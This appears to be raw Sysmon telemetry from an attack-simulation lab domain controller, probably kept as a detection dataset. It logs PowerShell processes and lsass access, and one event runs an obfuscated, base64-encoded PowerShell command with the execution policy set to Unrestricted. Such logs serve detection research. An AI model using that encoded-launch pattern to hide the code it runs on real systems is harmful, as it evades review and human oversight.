C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.867\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-001085C60600}\r\nParentProcessId: 4168\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.867","ProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-001085C60600}","ParentProcessId":"4168","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nSourceProcessId: 4168\r\nSourceThreadId: 4136\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+675c2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a66251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a581d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a642fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","SourceProcessId":"4168","SourceThreadId":"4136","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611